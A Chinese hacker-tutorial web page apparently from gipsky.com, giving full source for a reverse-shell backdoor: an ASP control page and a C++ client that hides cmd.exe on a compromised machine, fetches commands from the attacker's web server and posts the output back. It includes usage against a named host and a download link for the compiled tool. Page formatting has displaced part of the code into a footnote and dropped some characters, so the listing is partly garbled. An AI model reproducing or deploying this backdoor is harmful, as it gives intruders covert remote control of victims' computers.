首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 黑客教程

用ASP实现反向连接控制


http://www.gipsky.com/
原理:用ASP实现反向连接,客户端shell.exe大小6K,控制端console.asp大小1.75K

详解:

灵感来安闲入侵渗透内网时需反向连接但没有公网IP的时候,想到ASP的Application对象功能之强大,所以产生以下想法

肉机执行程序shell.exe让cmd.exe与偶网站一ASP程序进行交互,实现控制

Application("output")为输出流,保存程序执行结果

Application("input")为输入流,保存要执行的命令

思路:

[Client] <--- [Control] <--- [Attacker]



Client上运行shell.exe,Control运行console.asp,Attacker通过访问console.asp控制Client

实例:

肉机A,运行"shell.exe cooldiyer.uni.cc /cmd.asp"

偶网站放上cmd.asp,URL路径为<a href="http://cooldiyer.uni.cc/cmd.asp" target=_blank>http://cooldiyer.uni.cc/cmd.asp</a>

这时我访问<a href="http://cooldiyer.uni.cc/cmd.asp?who=master" target=_blank>http://cooldiyer.uni.cc/cmd.asp?who=master</a> (参数一定要加上,标明身份)

就可以进行控制了,Refresh刷新可以看到已经有结果了,输入命令,点Execute执行,过几秒钟后,

点击Refresh按钮可以看到执行结果,点击Clear清空输入输出流,执行"exit"程序退出

声明:

只做技术交流,程序只做演示使用,只实现与cmd.exe交互的功能,转载或修改需保留版权



代码:

console.asp

____________________________________________________________________________

<%

' 功能介绍:

' 用ASP实现反向SHELL连接,与cmd.exe交互,执行命令后点Refresh后就可以看到回显

' 公用变量 Application("input")、Application("output")为全局输入输出流



' 假如请求登录

if request("act") = "login" then

application("login") = "yes"

response.end

end if



' 假如请求退出

if request("act") = "exit" then

application("login") = "no"

application("input") = ""

application("outout") = ""

response.end

end if



' 验证是否已经登录

if application("login") <> "yes" and request("who") = "master" then

response.write "Client not connect.."

response.end

end if



' 假如请求执行命令,放到Input流里

if request("cmd") <> "" then

application("input") = request("cmd")

end if



' 假如命令执行完毕,结果放到output流,input流置空

if request("result")<>"" then

application("output") = application("output") request("result")

application("input") = ""

end if

%>



<% If request("frame")="1" Then %>



<%

' 假如请求清空输入输出流

if request("act") = "clear" then

Application("input") = ""

Application("output") = ""

response.redirect request.servervariables("script_name")&"?frame=1"

end if

%>

<textarea cols=120 rows=30>

<%=application("output")%>

</textarea>

<a href=# onclick="location.replace(location.href);">Refresh</a>

<a href=?frame=1&act=clear>Clear</a>

<% elseif request("who") = "master" then %>

<html>

<head><title>ASP Console Manager By cooldiyer</title></head>

<body>

<iframe src=<%=request.servervariables("script_name")%>?frame=1 width=900 height=500 frameborder=0></iframe><br>

<form method=post name=frm>

<input type=text size=50 name="cmd">

<input type=hidden name="who" value="master">

<input type=submit value="Execute">

</form>

<script>frm.cmd.focus();</script>

<%

else

response.write application("input")

end if

%>

____________________________________________________________________________

// shell.cpp : Defines the entry point for the console application.

//

// 实现功能: 与ASP控制端实现交互,实现反向连接

//



#include "stdafx.h"

#include "shell.h"

#include "afxinet.h"



#ifdef _DEBUG

#define new DEBUG_NEW

#undef THIS_FILE

static char THIS_FILE[] = __FILE__;

#endif



#define BUFFER_SIZE 1024 // 读缓冲区大小

/////////////////////////////////////////////////////////////////////////////

// The one and only application object



CWinApp theApp;



using namespace std;



CString URLEncode(const char* s); // URL 编码函数

BOOL PostRequest(const char *szFormData, char *szResult); // 向控制端发送请求函数

void DoShell(); // 与cmd.exe进行交互函数

char szServer[50], szPath[50]; // 公用变量



int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])

{

int nRetCode = 0;



// initialize MFC and print and error on failure

if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))

{

// TOD change error code to suit your needs

cerr << _T("Fatal Error: MFC initialization failed") << endl;

nRetCode = 1;

}

printf("ASP Console Client By CoolDiyer\n");

if (argc == 3)

{

memset(szServer, 0, sizeof(szServer));

memset(szPath, 0, sizeof(szPath));

strcpy(szServer, argv[1]);

strcpy(szPath, argv[2]);

}

else

{

printf("Usage:\n\trshell <Server> <Path>\nExp.\n\trshell <a href="http://www.abc.com" target=_blank>www.abc.com</a> /x.asp\n");

return -1;

}

char szResult[1024];

PostRequest("act=login", szResult); //登录

DoShell(); // 执行与cmd.exe的交互

PostRequest("act=exit", szResult); //退出

return nRetCode;

}



//

// URL编码函数,返回一个CString变量

//



CString URLEncode(const char* s)

{

CString encoded = "";

int len = strlen(s);

char* buf = new char[16]; // way longer than needed

unsigned char c;



for(int i=0; i < len; i )

{

c = s<i>;

if [1]

{

while(pFile->ReadString(szData))

{

if (szResult != NULL)

strcpy(szResult, szData.GetBuffer(0));

}

pFile->Close();

}

session.Close();

}

catch(...){

if (uRetry --)

goto loop;

}

return TRUE;

}



//

// 让cmd.exe与ASP控制端进行交互的核心例程

//



void DoShell()

{

int ret;



SECURITY_ATTRIBUTES sa;



sa.nLength = sizeof( sa );

sa.lpSecurityDescriptor = 0;

sa.bInheritHandle = TRUE;



HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;



ret=CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0);

ret=CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0);



STARTUPINFO si;

ZeroMemory(&si, sizeof(si));



GetStartupInfo(&si);



si.cb = sizeof(si);

si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

si.wShowWindow = SW_HIDE;

si.hStdInput = hReadPipe2;

si.hStdOutput = si.hStdError = hWritePipe1;



PROCESS_INFORMATION processInfo;



char cmdLine[] = "cmd.exe";



ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));

ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, &processInfo);



char buff[BUFFER_SIZE] = { 0 };

char szTmp[BUFFER_SIZE*3]; // 因为要把结果进行编码,所以缓冲区相对要大

unsigned long bytesRead = 0;

int i = 0;



while (TRUE)

{

memset(buff, 0, BUFFER_SIZE);

ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, 0, 0);



for (i = 0; i < 5 && bytesRead == 0; i )

{

Sleep(100);

ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, NULL, NULL);

}



if (bytesRead)

{

ret = ReadFile( hReadPipe1, buff, bytesRead, &bytesRead, 0 );

if (!ret) break;

memset(szTmp, 0, sizeof(szTmp));

strcpy(szTmp, "result=");

strcat(szTmp, URLEncode(buff).GetBuffer(0));

printf("%s", szTmp);

PostRequest(szTmp, NULL); // 发送命令执行结果

printf("Post command result ok\n");

}

else

{

// 得到要执行的命令

do

{

PostRequest("get=yes", buff);

printf("get command\n");

::Sleep(1000); // 间隔为1秒

}

while (strlen(buff) <= 0);

printf("%s\n", buff);

// 命令为exit则退出

if (strcmp(buff, "exit") == 0) break; // 程序退出



strcat(buff, "\n"); // 加上换行

bytesRead = strlen(buff);

printf("execute command %s", buff);

// 执行命令

WriteFile( hWritePipe2, buff, bytesRead, &bytesRead, 0);

}

}



TerminateProcess(processInfo.hProcess, 0);



CloseHandle(hReadPipe1);

CloseHandle(hReadPipe2);

CloseHandle(hWritePipe1);

CloseHandle(hWritePipe2);

}

____________________________________________________________________________

备注:

以上代码可能因过滤而显示错误,请下载压缩包(含全部源代码和编译好的程序): <a href="http://201314.free.fr/attachments/200612/aspconsole.zip" target=_blank>http://201314.free.fr/attachments/200612/aspconsole.zip</a>
附注
  1. c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||

    (c >= '0' && c <= '9') || c == '.' || c == '-' || c == '_')

    {

    sprintf(buf, "%c", c);

    encoded = buf;

    continue;

    }

    if(c == ' ')

    {

    sprintf(buf, "%c", ' ');

    encoded = buf;

    continue;

    }

    sprintf(buf, "%.2X", c);

    encoded = "%";

    encoded = buf;

    }



    delete[] buf;

    return encoded;

    }



    //

    // 表单发送函数,核心例程,返回接收到的内容,也就是要执行的命令

    //



    BOOL PostRequest(const char *szFormData, char *szResult)

    {

    unsigned int uRetry = 3; //重试三次

    try{

    loop:

    CInternetSession session;

    CHttpConnection *pConnection = session.GetHttpConnection(szServer);

    CHttpFile *pFile = pConnection->OpenRequest(CHttpConnection::HTTP_VERB_POST, szPath);

    // AddRequestHeaders是必要的

    pFile->AddRequestHeaders("Content-Type: application/x-www-form-urlencoded");

    CString szData;



    if (pFile -> SendRequest(NULL,0,(LPVOID) szFormData, strlen(szFormData) 1
<< LBS blog sql注射漏洞(统杀所有版本) Dvbbs 7.1Sql版跳过死循环提权得Shell >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号